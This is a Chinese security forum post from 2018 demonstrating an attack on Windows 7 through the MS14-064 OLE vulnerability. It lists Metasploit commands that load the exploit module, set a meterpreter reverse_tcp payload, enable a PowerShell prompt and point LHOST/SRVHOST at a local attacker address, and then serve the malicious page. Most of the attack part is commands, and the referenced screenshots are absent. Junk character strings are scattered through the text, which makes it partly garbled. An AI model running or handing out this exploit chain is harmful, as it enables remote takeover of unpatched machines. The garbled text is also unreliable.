找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1619|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 X d; D1 _- g7 f7 w 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 / {4 ]# l# w9 E+ J4 {; Z

: S( ]3 I) L% p) s0 t

9 k/ G6 ~8 U- N# C 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: , }. z& \$ m% Q7 r8 p2 T, k/ u/ T

2 |: L4 `- s( ?% Z

+ E, A$ Q5 c# j! \( i `/ Y8 u 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp3 [3 \, o2 ?2 h

" i! ]" d$ i: S! |/ Z X2 z

3 V( ?, o# w' ]$ L             set AllowPowershellPrompt true0 ~. s3 |, w W5 Q

3 i1 A5 U9 f" J. J3 j% z

; E+ B( } D* W7 I v0 g6 S# Z8 J2 J* i             Set LHOST 192.168.0.109 ; | n$ _ U, }$ Y6 ~ z

) o# h8 }6 @ K8 X7 p

6 J+ O, S' G# Z5 o+ K* q             set SRVHOST 192.168.0.109 + [) t6 C: |# G5 x& q

- N- k9 { U9 [" B

9 C' p" c8 t3 k& h5 f, J) h             Set uripath share . P( ^. M6 V2 Y6 y) c+ q

5 g9 Y$ c0 W8 f1 v

9 C( p/ t1 S$ Y2 Z             Set srvport 801 ]0 R! n/ o; n

6 }+ c( M1 T6 ~" J

( J- G7 u+ l9 s( \1 [9 e% a2 _   ) v# J+ p% P/ ~/ X

8 Q, S4 i: z8 x6 w1 O7 K8 V

+ V7 J' M( t" k# V& y; h7 ~7 T  : y& t4 J2 w( e7 \7 [: L

+ ^ R) `6 z% G P2 {

- s8 ]! f/ y, I9 t3 X i% H( c   ; K! p: D" c9 Y& r

4 e: u2 _' i) @

$ m: r( _- q5 M   0 m( {4 n9 M q

* Z; U. F3 U0 @: d9 J0 p6 e

' ~4 E; F# }' ?+ N' {* T   # y# E# i r$ m% l

3 {% c2 b0 _! q( U" a7 ]

0 R6 X: Y: r/ E8 {4 S 下面我们来访问本地地址如图:4 K: h8 q: E m3 {% y+ l1 [

; d5 r( n9 k4 K9 p5 ~# Y8 I9 E

! L+ h+ t* v q  + ?* V9 A. f2 D! j: V7 `

' N% q1 Y. N s, O- D5 |

- h" H' e' Z, J8 o# ^% X: d) [+ o   : a3 ]# A3 b! R

+ p/ p1 P! w7 R1 v1 S7 J

+ z7 m i& G) q* @ ; I6 w8 }/ J/ n' X1 ]

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表